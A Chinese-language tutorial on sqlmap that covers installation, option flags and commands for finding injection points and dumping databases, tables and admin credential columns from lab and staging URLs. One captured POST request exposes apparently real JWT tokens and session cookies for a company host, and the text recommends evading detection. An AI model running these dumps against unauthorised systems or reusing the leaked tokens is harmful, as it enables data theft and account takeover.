一.介紹
sqlmap 是一個(gè)自動(dòng)化的 sql 注入滲透工具,指紋檢測(cè)、注入方式、注入成功后的取數(shù)據(jù)等等都是自動(dòng)化的,sqlmap 還提供了很多腳本.但在實(shí)踐測(cè)試的時(shí)候基本用不上.用于檢測(cè)和利用 Web 應(yīng)用程序中的 SQL 注入漏洞。它自動(dòng)化了識(shí)別和利用 SQL 注入漏洞的過(guò)程,并可用于執(zhí)行各種任務(wù),例如提取數(shù)據(jù),訪問(wèn)底層文件系統(tǒng)以及在操作系統(tǒng)上執(zhí)行命令。
SQLmap 支持多種數(shù)據(jù)庫(kù)管理系統(tǒng),包括
MySQL、Oracle、PostgreSQL、Microsoft SQL Server
等。它可以通過(guò)命令行界面或圖形化界面進(jìn)行操作,并提供了豐富的選項(xiàng)和功能,例如指定注入點(diǎn)、指定注入方式、指定數(shù)據(jù)提取方式等。同時(shí),它也支持自定義腳本和插件,以擴(kuò)展其功能和適應(yīng)更多的情況。SQLmap
被廣泛應(yīng)用于滲透測(cè)試、安全研究、教育等領(lǐng)域。
SQLmap 使用 Python 語(yǔ)言編寫(xiě),可以在多種操作系統(tǒng)上運(yùn)行,例如 Linux、Windows、Mac OS 等。它的使用方法相對(duì)簡(jiǎn)單,但需要一定的 SQL 注入和滲透測(cè)試基礎(chǔ),否則可能會(huì)對(duì)目標(biāo)系統(tǒng)造成損害。因此,在使用 SQLmap 時(shí),需要遵循合法、合規(guī)、道德的原則,遵守法律法規(guī),并獲得相關(guān)授權(quán)和許可。
為了更好地使用 SQLmap,需要了解 SQL 注入漏洞的原理和利用方式,以及目標(biāo)系統(tǒng)的相關(guān)信息和配置。在使用 SQLmap 進(jìn)行滲透測(cè)試時(shí),需要選擇合適的注入點(diǎn)和注入方式,并進(jìn)行參數(shù)配置和結(jié)果分析。同時(shí),還需要注意防止被目標(biāo)系統(tǒng)的安全機(jī)制檢測(cè)和防御,例如使用代理、隨機(jī)延時(shí)、避免過(guò)多的請(qǐng)求等。最后,在使用 SQLmap 進(jìn)行滲透測(cè)試時(shí),需要保護(hù)好自己的安全和隱私,防止泄露個(gè)人信息和被攻擊者反制。
二.安裝 sqlmap
1.創(chuàng)建目錄
cd /usr/bin
mkdir sqlmap-dev
2.拉取代碼
git clone https://github.com/sqlmapproject/sqlmap.git
3.配置
vim ~/.bash_profile
source ~/.bash_profile
alias sqlmap='Python3 /usr/bin/sqlmap-dev/sqlmap.py'
4.驗(yàn)證安裝
sqlmap #查看版本
salmap?-v??#查看版本
三.使用
1.參數(shù)說(shuō)明
-u 指定URL
-p 指定參數(shù)
-v 指定顯示級(jí)別
--dbs 目標(biāo)服務(wù)器中的數(shù)據(jù)庫(kù)
--current-db 當(dāng)前數(shù)據(jù)庫(kù)
--tables 目標(biāo)數(shù)據(jù)庫(kù)有什么表
--columns 目標(biāo)表中有什么列
--dump 獲取數(shù)據(jù)
--batch 跳過(guò)問(wèn)詢(yes)之間執(zhí)行,批處理,在檢測(cè)過(guò)程中會(huì)問(wèn)用戶一些問(wèn)題,使用這個(gè)參數(shù)統(tǒng)統(tǒng)使用默認(rèn)值
--dbms 指定數(shù)據(jù)庫(kù)類型
--current-user 查看當(dāng)前用戶
--users 查看所有用戶
--passwords 數(shù)據(jù)庫(kù)密碼
--hostname 系統(tǒng)名稱
--banner 數(shù)據(jù)庫(kù)信息
--roles??數(shù)據(jù)庫(kù)用戶角色
level 和 risk
在 SQLmap 中,level
和risk
是兩個(gè)重要的選項(xiàng),用于指定 SQL 注入檢測(cè)和利用的深度和風(fēng)險(xiǎn)程度。level
選項(xiàng)用于指定檢測(cè)的深度,取值范圍為 1~5,數(shù)字越大,檢測(cè)的深度越深,檢測(cè)的速度越慢。默認(rèn)值為 1,表示最淺層的檢測(cè)。risk
選項(xiàng)用于指定檢測(cè)和利用的風(fēng)險(xiǎn)程度,取值范圍為 0~3,數(shù)字越大,風(fēng)險(xiǎn)越高,檢測(cè)和利用的方式越激進(jìn)。默認(rèn)值為 1,表示中等的風(fēng)險(xiǎn)程度。在使用 SQLmap 時(shí),根據(jù)實(shí)際情況選擇合適的level
和risk
選項(xiàng),可以提高檢測(cè)和利用的效率和成功率,同時(shí)避免對(duì)目標(biāo)系統(tǒng)造成過(guò)多的影響和損害。
需要注意的是,level
和risk
選項(xiàng)雖然可以提高檢測(cè)和利用的效率和成功率,但也會(huì)增加誤報(bào)和誤判的風(fēng)險(xiǎn),甚至可能引發(fā)系統(tǒng)崩潰和數(shù)據(jù)損壞等問(wèn)題。因此,在使用這兩個(gè)選項(xiàng)時(shí),需要謹(jǐn)慎評(píng)估風(fēng)險(xiǎn)和影響,并進(jìn)行充分的測(cè)試和驗(yàn)證。同時(shí),還需要遵守合法、合規(guī)、道德的原則,遵守法律法規(guī),并獲得相關(guān)授權(quán)和許可,以避免違法和不當(dāng)行為帶來(lái)的法律和道德風(fēng)險(xiǎn)。
Sqlmap 一共有 5 個(gè)探測(cè)等級(jí),默認(rèn)是 1。等級(jí)越高,說(shuō)明探測(cè)時(shí)使用的 payload 也越多。其中 5 級(jí)的 payload 最多,會(huì)自動(dòng)破解出 cookie、XFF 等頭部注入。當(dāng)然,等級(jí)越高,探測(cè)的時(shí)間也越慢。這個(gè)參數(shù)會(huì)影響測(cè)試的注入點(diǎn),GET 和 POST 的數(shù)據(jù)都會(huì)進(jìn)行測(cè)試,HTTP cookie
在 level 為 2 時(shí)就會(huì)測(cè)試,HTTP User-Agent/Referer
頭在 level 為 3 時(shí)就會(huì)測(cè)試。在不確定哪個(gè)參數(shù)為注入點(diǎn)時(shí),為了保證準(zhǔn)確性,建議設(shè)置 level 為5
sqlmap 一共有 3 個(gè)危險(xiǎn)等級(jí),也就是說(shuō)你認(rèn)為這個(gè)網(wǎng)站存在幾級(jí)的危險(xiǎn)等級(jí)。和探測(cè)等級(jí)一個(gè)意思,在不確定的情況下,建議設(shè)置為 3 級(jí)
如下,設(shè)置探測(cè)等級(jí) 5,平臺(tái)危險(xiǎn)等級(jí) 3,都是最高級(jí)別,進(jìn)行掃描:
sqlmap?-u?"http://xxx:7777/Less-1/"?--level=5?--risk=3
2.get 方法
1.判斷是否有注入點(diǎn)
sqlmap?-u?"目標(biāo)url"
2.查看數(shù)據(jù)庫(kù)
sqlmap -u "目標(biāo)_url" --dbs --dbms mysql
--dbms=DBMS?#指定目標(biāo)數(shù)據(jù)庫(kù)類型
3.當(dāng)前數(shù)據(jù)庫(kù)
sqlmap?-u?"目標(biāo)_url"?--current-db?--dbms?mysql
4.字段獲取
?sqlmap?-u?"目標(biāo)url"?-D?庫(kù)名?-T?表名?--columns
5.指定字段內(nèi)容???????
sqlmap -u "目標(biāo)url" -D 庫(kù)名 -T 表名 -C 字段名1,字段名2,等等 --dump
-C COL 指定從某個(gè)列查詢數(shù)據(jù)
--dump 查詢指定范圍的全部數(shù)據(jù)
(對(duì)加密的密碼進(jìn)行彩虹表攻擊)
6.樣例
sqlmap.py?-u?"http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"?--cookie="security=low;PHPSESSID=nh9elbltn3coe0kgvdnq1l6755"?--batch
3.post 方式
1.保存參數(shù)
post.txt???????
POST /xxx-dsc-insight/test/prd/open-api/v1/sku/ck/v1.8.4/page?appid=0 HTTP/1.1
Host: xxx-uat.net.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
brandDetailNo: BS01
application: command
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJyb25nZGkiLCJzdWIiOiJOVUxMIiwibW9iaWxlIjoiTlVMTCIsImlzcyI6ImRlZXBleGktZHNjLWJlbGxlLWluc2lnaHQiLCJzbiI6IuiNo-mAkiIsImV4cCI6MTY3NjY5OTc0NCwiaWF0IjoxNjc1ODM1NzQ0LCJqdGkiOiJyb25nZGkiLCJlbXBsb3llZU51bWJlciI6Ik5VTEwifQ.GeZhmSvBD7eQ5TEaxj1UCIq7dte8RRzPBSZoM1TEsaM
uid: rongdi
Content-Type: application/json;charset=utf-8
silent: true
Content-Length: 310
Origin: https://xxx-uat.net.cn
Connection: close
Referer: https://xxx-uat.net.cn/test/command/bs01/
Cookie: route=4daa8dd1683d45d93b8d439c25742107; brand-token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJyb25nZGkiLCJzdWIiOiJOVUxMIiwiaXNzIjoiZGVlcGV4aS1kc2MtYmVsbGUtaW5zaWdodCIsInNuIjoi6I2j6YCSIiwidXNlclR5cGUiOiJicmFuZCIsInVzZXJOYW1lIjoi6I2j6YCSIiwiZXhwIjoxNjc2Njk5NjMzLCJ1c2VySWQiOjM0MSwiaWF0IjoxNjc1ODM1NjMzLCJ1c2VyRW1wbG95ZWVOdW1iZXIiOiJyb25nZGkiLCJqdGkiOiJyb25nZGkiLCJlbXBsb3llZU51bWJlciI6Ik5VTEwifQ.PIZ5HapYBE62YAn5swGDyKjj9JAVXPIvEkJ8qPrlKUY; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJyb25nZGkiLCJzdWIiOiJOVUxMIiwiaXNzIjoiZGVlcGV4aS1kc2MtYmVsbGUtaW5zaWdodCIsInNuIjoi6I2j6YCSIiwidXNlclR5cGUiOiJicmFuZCIsInVzZXJOYW1lIjoi6I2j6YCSIiwiZXhwIjoxNjc2Njk5NjMzLCJ1c2VySWQiOjM0MSwiaWF0IjoxNjc1ODM1NjMzLCJ1c2VyRW1wbG95ZWVOdW1iZXIiOiJyb25nZGkiLCJqdGkiOiJyb25nZGkiLCJlbXBsb3llZU51bWJlciI6Ik5VTEwifQ.PIZ5HapYBE62YAn5swGDyKjj9JAVXPIvEkJ8qPrlKUY; userId=undefined; tenantId=undefined; expires_in=undefined; refresh_token=undefined; groupId=undefined; _ati=3597590558839; JSESSIONID=88CF2B86EDCE43CA57C3B623FA4A3F13; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%221862f97cae4185-08d6e9e06522c4-c5d5428-2073600-1862f97cae54e8%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMTg2MmY5N2NhZTQxODUtMDhkNmU5ZTA2NTIyYzQtYzVkNTQyOC0yMDczNjAwLTE4NjJmOTdjYWU1NGU4In0%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%221862f97cae4185-08d6e9e06522c4-c5d5428-2073600-1862f97cae54e8%22%7D; sajssdk_2015_cross_new_user=1; qa-token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJyb25nZGkiLCJzdWIiOiJOVUxMIiwibW9iaWxlIjoiTlVMTCIsImlzcyI6ImRlZXBleGktZHNjLWJlbGxlLWluc2lnaHQiLCJzbiI6IuiNo-mAkiIsImV4cCI6MTY3NjY5OTc0NCwiaWF0IjoxNjc1ODM1NzQ0LCJqdGkiOiJyb25nZGkiLCJlbXBsb3llZU51bWJlciI6Ik5VTEwifQ.GeZhmSvBD7eQ5TEaxj1UCIq7dte8RRzPBSZoM1TEsaM; qa-userId=undefined; qa-tenantId=undefined; qa-expires_in=undefined; qa-refresh_token=undefined; qa-groupId=undefined
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"businesscityno":"1","categoryname1":"1","categoryno2":"-1","categoryno3":"-1","date":"2023-02-06","gendername":"7","invqtylist":["c"],"isinvqty":0,"operateevent":"':","page":1,"productcode":"","productyearname":"","regionname":"","regionno":"c","seasonname":"","size":80,"sortname":"salqty","sortord":"desc"}
2.執(zhí)行
sqlmap?-r?/Users/qinyingjie/Downloads/post2.txt?-p?"categoryname1"?--level?5?--risk?3?--batch
3.查詢結(jié)果
四.常用
1.查詢庫(kù)名
python?sqlmap.py?-u?"http://rhiq8003.ia.aqlab.cn/?id=1"?--dbs
2.查詢表
-D 指定庫(kù)名文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-817521.html
python?sqlmap.py?-u?"http://rhiq8003.ia.aqlab.cn/?id=1"?-D?maoshe?--tables
3.查詢列
python?sqlmap.py?-u?"http://rhiq8003.ia.aqlab.cn/?id=1"?-D?maoshe?-T?admin?--columns
4.查詢列值
吃牢飯指令文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-817521.html
python?sqlmap.py?-u?"http://rhiq8003.ia.aqlab.cn/?id=1"?-D?maoshe?-T?admin?-C?pa
到了這里,關(guān)于sqlmap 是一個(gè)自動(dòng)化的 sql 注入滲透工具的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!